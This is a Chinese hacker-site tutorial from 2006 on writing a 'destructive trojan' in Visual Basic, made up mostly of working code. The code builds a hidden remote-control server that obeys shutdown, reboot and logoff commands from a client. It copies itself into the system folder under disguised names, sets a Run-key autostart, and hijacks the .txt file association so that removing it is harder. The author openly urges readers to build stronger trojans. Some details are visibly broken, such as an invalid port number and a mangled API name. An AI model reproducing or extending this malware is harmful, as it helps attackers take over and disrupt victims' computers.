设为首页  加入收藏  联系我们 繁體中文  

黑客软件:
  漏洞扫描 | 木马间谍 | 加密解密 | 远程控制 | 破坏攻击 | 杀毒软件 | 防火墙类 | OICQ专区 | 黑客必备 | 常用工具 | 网吧攻击
文章中心:   最新资讯 | 黑客技术 | 电脑基础 | 菜鸟文摘 | 网络安全 | 网络技巧 | QQ技巧 | OQ空间代码 | 免费资源 | 编程世界 | 建站技术
素材源码:   论坛相关 | ASP源码 | CGI 源码 | NET 源码 | PHP 源码 | 酷站素材 | 字体素材 | 图片素材 | 友情发布 | 网页模版 | 建站软件
教程动画:   黑客教程 | 黑客编程 | 网站入侵 | 菜鸟教程 | 入侵教程 | 破解教程 | 电子书籍 | 网页制作 | 高级会员 | 综合教程 | 本站原创
   

  您当前的位置:中华隐士黑客联盟 -> 编程世界 -> 黑客编程 -> 文章内容 [站内搜索]  

 
利用Visual Basic编写破坏性木马
作者:不详  来源:转载  发布时间:2006-12-21 12:08:56  发布人:heigeheapao

首先,新建一工程,名为Server,新建一个窗体,Name为Server,在窗体中加入一个winsock控件,Name设为sckServer,协议设为默认的TCP/IP协议。

接下来我们回来Server窗体模块中,添加如下代码: 











Private Sub form_Load() 
  With Me 
   .sckServer.LocalPort = 88917'本地端口(呵呵!我的生日!) 
   .sckServer.Listen '开始监听 
  End With 
End Sub 

'接受客户端的连接请求。 

Private Sub sckServer_ConnectionRequest(ByVal requestID As Long) 
  With Me 
   If .sckServer.State <>sckClosed Then .sckServer.Close 
   .sckServer.Accept (requestID) 
  End With 
End Sub

下面我们来建立客户端程序:新建一个工程,名为Client,把窗体名为Client,在上面加入一个winsock控件,名为sckClient,协议为TCP/IP协议。再加一个按钮cmdConnect在窗体模块中加入代码: 

Private Sub form_Load() 
  With Me 
   .sckClient.RemoteHost = "127.0.0.1"'设置远程IP,本例设为本机。 
   .sckClient.RemotePort = 88917 '远程端口,就为server中的设置一样. 
  End With 
End Sub 

Private sub cmdConnect_Click() 
  SckClient.Connect 
End sub

至此,单击Connect按钮我们的两个工程已经可以进行通信了,但看不见,你可以在Client中的sckClient_Connect事件中加入代码:debug.print “Connetion successful!”来查看。

这仅是第一步,一点工作也做不了,下面我们来为它们添加功能。为了简单,本文章只实现一点小小的功能——关机,重启,注销。好,开始吧!

在Server工程中新建一个模块,Name为modApi,这个模快为一些API函数,添加如下API函数: 

Public Declare Function ExitWindowXXX Lib "user32" Alias "ExitWindowXXX" (ByVal uFlags As
 Long, ByVal dwReserved As Long) As Long 

Public Const EWX_LOGOFF = 0 
Public Const EWX_REBOOT = 2 
Public Const EWX_SHUTDOWN = 1 
Public Declare Function ClipCursor Lib "user32" Alias "ClipCursor" (lpRect As Any) As 
Long 

Public Type RECT 
  Left As Long 
  Top As Long 
  Right As Long 
  Bottom As Long 
End Type

注:在两个socket中编程中,进行通信的重要事件是DataArrival事件,用于接收远程数据

下面在Client工程的Client窗体中放入三个按钮,分别为cmdExit,cmdLogoff,cmdReboot。它们用于对远程的关机,注销,重启操作。分别添加如下代码: 

Private Sub cmdExit_Click() 
  Me.sckClient.SendData "Exit" 
End Sub 

Private Sub cmdLogoff_Click() 
  Me.sckClient.SendData "Logoff" 
End Sub 

Private Sub cmdReboot_Click() 
  Me.sckClient.SendData "Reboot" 
End Sub

全都是对服务端发出请求。下面转到Server工程中:在Server中添加sckServer的DataArrial事件,接收客户端的请求。 

Private Sub sckServer_DataArrival(ByVal bytesTotal As Long) 
  Dim strData As String 
  With Me 
   ' 接收客户请求的信息 
   .sckServer.GetData strData 
   Select Case strData 
    Case "Exit" 
     '关机 
     Call ExitWindowXXX(EWX_SHUTDOWN, 0) 
    Case "Reboot" 
     '重启 
     Call ExitWindowXXX(EWX_REBOOT, 0) 
    Case "Logoff" 
     '注销 
    Call ExitWindowXXX(EWX_LOGOFF, 0) 
   End Select 
  End With 

End Sub

好了,到此我们已经实现功能了,但还不行,我们要它在背后运行。这简单,在Server中的form_Load事件中加入一句:me.hide。好这下看不见了,但大家知道木马是一开机就自动运行了,这又是为什么,怎么实现的?把它加入到注册表的启动组中?对,不错,跟我来吧!

回到Server工程中的modApi中加入如下API函数: 

Public Declare Function RegOpenKey Lib "advapi32.dll" 
Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As 
Long 

Public Declare Function RegSetvalueEx Lib "advapi32.dll" Alias "RegSetvalueExA" (ByVal 
hKey As Long, ByVal lpvalueName As String, ByVal Reserved As Long, ByVal dwType As Long, 
lpData As Any, ByVal cbData As Long) As Long 

Public Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey 
As Long, ByVal lpSubKey As String, phkResult As Long) As Long 
Public Const REG_BINARY = 3 

Public Const REG_SZ = 1 

Public Const HKEY_LOCAL_MACHINE = &H80000002 

Public Const HKEY_CLASSES_ROOT = &H80000000

写到注册表启动组中的过程。 

Public Sub StartupGroup() 

  Dim sKey As String 
  Dim result As Long 
  Dim hKeyID As Long 
  Dim sKeyVal As String 

  sKey = "Systrsy" '启动组中的键,找一个与系统文件相近的。 
  sKeyVal = "C:/windows/system/systrsy.exe" '木马文件的路径,可以用GetSystemDirectory来取
得系统路径。 
  result = RegOpenKey(HKEY_LOCAL_MACHINE, _ 
    "Software/Microsoft/Windows/CurrentVersion/Run", hKeyID) 
  If result = 0 Then 
   result = RegSetvalueEx(hKeyID, sKey, 0&, REG_SZ, sKeyVal, Len(sKey) + 1) 
  End If 
End Sub

好,就这样简单地完成了。但是,想过没有,如果不是很菜的鸟,到注册表中见一删,我们苦苦的心血不就白白地浪费了吗?不行,还得想让他发现了删也删不掉。请看下面的代码: 

Public Sub WriteToTxt() 

  Dim result As Long 
  Dim hKeyID As Long 
  Dim skey As String 
  Dim skeyVal As String 

  skey = "txtfile/shell/open/command" 
  skeyVal = "C:/windows/system/txtView.exe" 
  result = RegOpenKey(HKEY_CLASSES_ROOT, skeyVal, hKeyID) 

  If result = 0 Then 
   result = RegSetvalueEx(hKeyID, skey, 0&, REG_SZ, skeyVal, Len(skeyVal) + 1) 
  End If 
End Sub

肯定不少朋友一看就知道了,原是与txt文件进行关联,一点也不错,但C:/windows/system/

txtView.exe是哪里来的,我们的木马是C:/windows/system/systrsy.exe呀。这可是我们木马的分身了。

好,回到Server工程的Server窗体的form_Load中,加入如下代码: 

Dim sCurrentPath As String, sSystemDir As String 
sCurrentPath = App.Path & "/" & App.EXEName & ".exe" 
sSystemDir = “C:/windows/system” 
On Error Resume Next 

  '复制文件成系统目录下的Systrsy.exe 
  FileCopy sCurrentPath, sSystemDir & "/Systrsy.exe" 
On Error Resume Next 

复制文件成系统目录下的txtView.exe 

FileCopy sCurrentPath, sSystemDir & "/txtView.exe" 

   调用 

Call startupGroup 
Call WriteToTxt 

'判断程序是否下在运行 

If App.PrevInstance Then 
  '如果已经运行就退出。 
End 

End If

好了,写到这里一个破坏性木马已经诞生了,我实验过还是比较好的一个,希望大家也能写一个好的木马,能突破冰河。

注意:

1、大家在处理端口是最好使用高端端口,否则会和一些常用端口发生冲突。

2、在第一次使用VB.NET的最好看看有关的图书,可能你能写出一款超级木马也说不定。
[] [返回上一页] [打 印] [收 藏]
  [相关文章评论]    (评论内容只代表网友观点,与本站立场无关!) [更多评论...]
 

  小心 黑客利用Googl..
利用网站错误配置获..
利用SQL分离器实现s..
利用反向通道与隧道..
另辟蹊径 利用别人提..
黑客如何利用文件包..
好用的CSS挂马利用方..
利用反向通道与隧道..
另辟蹊径 利用别人提..
利用WINXP组策略实现..


  
免费获得Q币的最新方法
最新免费在线看的电影网站集绵
不用木马,轻松万能偷daoQQ号码
最新QQ空间4.0全屏版效果图!!
新免蟆Q秀,刷红钻的方法
黑客快速入门(强烈推荐)
QQ密码本地破解的原理和方法
18岁少女欲6000元卖处女身 救患血..
8款QQ空间免费开场动画
免费QQ蓝钻体验(附考试答案)
 
设置Web邮箱黑客警报器 防止财务.. 04-11
二行代码解决全部网页木马(含ifr.. 04-11
防止黑客根据PHP中的错误信息爆路.. 04-11
webshell下查找所有IIS站点配置... 04-11
终级win2003服务器安全配置篇! 04-11
解决“网际快车”和“迅雷”右键.. 04-11
英国电信(BT)被指监视36000余名互.. 04-11
用命令行开启或关闭 IP 安全策略.. 04-11
Firefox2狂占CPU解决办法 04-11
大水牛下载者手工清除的方法 04-11
 
关于本站 网站帮助 广告合作 下载声明 友情连接 网站地图 访客留言 论坛登录
〖中华隐士黑客联盟〗,Copyright © 2006-2010 WwW.Hack86.Com 闽ICP备:06023304号
站长:小质 QQ:771760,软件发布MAIL:Hack086@21cn.com